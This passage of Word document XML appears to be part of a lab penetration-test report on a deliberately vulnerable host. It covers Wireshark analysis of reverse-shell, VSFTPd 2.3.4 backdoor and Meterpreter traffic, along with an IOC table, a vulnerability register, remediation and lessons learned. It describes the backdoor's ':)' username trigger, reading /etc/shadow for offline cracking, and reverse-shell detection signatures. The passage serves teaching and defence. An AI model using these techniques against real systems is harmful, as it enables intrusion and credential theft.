        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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System hashes dumped</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Alternative credential extraction method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD0E21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file was successfully read, exposing hashed passwords for all system accounts including root. These hashes could be subjected to offline brute-force or dictionary attacks to recover plaintext passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5. Traffic Analysis — Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Wire</w:t>
      </w:r>
      <w:r>
        <w:t>shark was running throughout the entire assessment on the Kali host-only interface, capturing all attack traffic. The following key observations were made from the packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Reverse Shell Traffic (Port 4444)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filter applied: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD201E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp.port == 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Fol</w:t>
      </w:r>
      <w:r>
        <w:t>lowing the TCP stream revealed the complete shell session in plaintext. Every command typed on the attacker machine and every response from the target was visible in the capture with no encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">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040423">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lastRenderedPageBreak/>
              <w:t>Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336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Security Implication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Connection direction</w:t>
            </w:r>
          </w:p>
        </w:tc>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Target (192.168.56.5) initiated connection to attacker (192.168.56.6)</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Classic reverse shell signature — target calls out</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Encryption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None — all data transmitted in plaintext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Full session contents visible to any network observer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Commands visible</w:t>
            </w:r>
          </w:p>
        </w:tc>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whoami, id, hostname, cat /etc/passwd, uname -a</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Complete attacker activity logged in capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Port used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4444 — non-standard port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Easily detected with port-based alerting rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Connection duration</w:t>
            </w:r>
          </w:p>
        </w:tc>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Extended TCP session</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Long-lived connections to unusual ports are suspicious</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 VSFTPd Backdoor Traffic (Ports 21 &amp; 6200)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filter applied: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD201E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp.port == 21 || tcp.port == 6200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The FTP control session clearly showed the backdoor trigger — the username containing '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD201E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:)</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — in plaintext. The subsequent opening of port 6200 with a root shell was also captured, making the entire exploit chain visible in the traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Meterpreter Traffic (Port 4433)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Unlike the Netcat shell, Meterpreter traffic on port 4433 appeared as enc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rypted binary data in Wireshark. The TCP stream was not human-readable, demonstrating why attackers prefer Meterpreter over plain Netcat for operational security. However, the connection itself (source, destination, timing, and duration) was still visible </w:t>
      </w:r>
      <w:r>
        <w:t>and detectable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Detection Signatures Identified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040423">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IOC Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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Confidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Non-standard outbound port</w:t>
            </w:r>
          </w:p>
        </w:tc>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Port 4444, 6200, 4433</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Reverse connection pattern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Internal host initiating outbound TCP to attacker IP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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Plaintext shell strings</w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bash: no job control', 'whoami', 'uid=0'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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FTP backdoor trigger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USER containing ':)' string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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Process anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>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Shell spawned by vsftpd process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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Shadow file access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Read of /etc/shadow by network process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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6. Vulnerability Register</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1400"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2560"/>
      </w:tblGrid>
      <w:tr w:rsidR="00040423">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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-001</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VSFTPd 2.3.4 Backdoor</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</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CVE-2011-2523</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Upgrade to VSFTPd 3.x immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-002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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse Shell via Netcat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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL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N/A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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Egress filtering, application whitelisting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-003</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL No Root Password</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</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N/A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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Set strong MySQL root password immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-004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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Telnet Service Exposed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HIGH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N/A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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disable Telnet, use SSH exclusively</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-005</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Outdated Linux Kernel</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HIGH</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Multiple</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Upgrade kernel — 2.6.24 has many local privesc CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-006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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VNC No Authentication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HIGH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N/A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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Require VNC password or disable service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-007</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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Plaintext Protocols</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MEDIUM</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Default="007200C9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A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040423" w:rsidRPr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replace FTP/Telnet with SFTP/SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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V-008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Pr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Excessive Open Ports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MEDIUM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Default="007200C9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A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0423" w:rsidRPr="00BD201E" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD201E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disable all unnecessary services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>7. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Immediate Actions (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade or remove VSFTPd 2.3.4 — this version has a deliberate backdoor and must never be used in any environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Set a strong password for MySQL root account immediately</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Implement egress filtering to restrict which internal hosts can initiate outbound con</w:t>
      </w:r>
      <w:r>
        <w:t>nections and to which ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Disable Telnet and replace with SSH for all remote administration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Short-Term Actions (High)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9" w:rsidP="00BD201E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade the Linux kernel from 2.6.24 to a current supported version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Audit all open ports and disable any service not explicitly required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Implement host-bas</w:t>
      </w:r>
      <w:r w:rsidR="00BD201E">
        <w:t>ed firewall rule</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to restrict service exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.3 Long-Term / Defense-in-Depth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an IDS/IPS (Snort or Suricata) with rules for reverse shell patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Implement a SIEM solution (Splunk/ELK) to centralize log analysis and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce principle of least privilege — network services must not run as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Establish a vulnerability mana</w:t>
      </w:r>
      <w:r>
        <w:t>gement program with regular patching cycles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy EDR tooling to detect an</w:t>
      </w:r>
      <w:r w:rsidR="00BD201E">
        <w:t>omalous process spawning (</w:t>
      </w:r>
      <w:r>
        <w:t>shell from network service)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>8. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Technical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse shells bypass inbound firewall rules by having the target initiate outbound con</w:t>
      </w:r>
      <w:r>
        <w:t>nections — egress filtering is therefore a critical defensive control that is frequently overlooked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A single unpatched service (VSFTPd 2.3.4 from 2011) provided immediate root access, demonstrating the devastating impact of poor patch management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plaintext </w:t>
      </w:r>
      <w:r>
        <w:t>protocols expose the complete contents of attacker sessions to any network observer — encryption matters even within internal networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter's encrypted channel versus Netcat's plaintext transmission illustrates the operational security consideration</w:t>
      </w:r>
      <w:r>
        <w:t>s real attackers make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Process lineage is a powerful detection mechanism — a bash shell spawned by vsftpd is immediately suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Structured reconnaissance before exploitation produced better results — the Nmap scan immediately identified</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the most critical target (VSFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
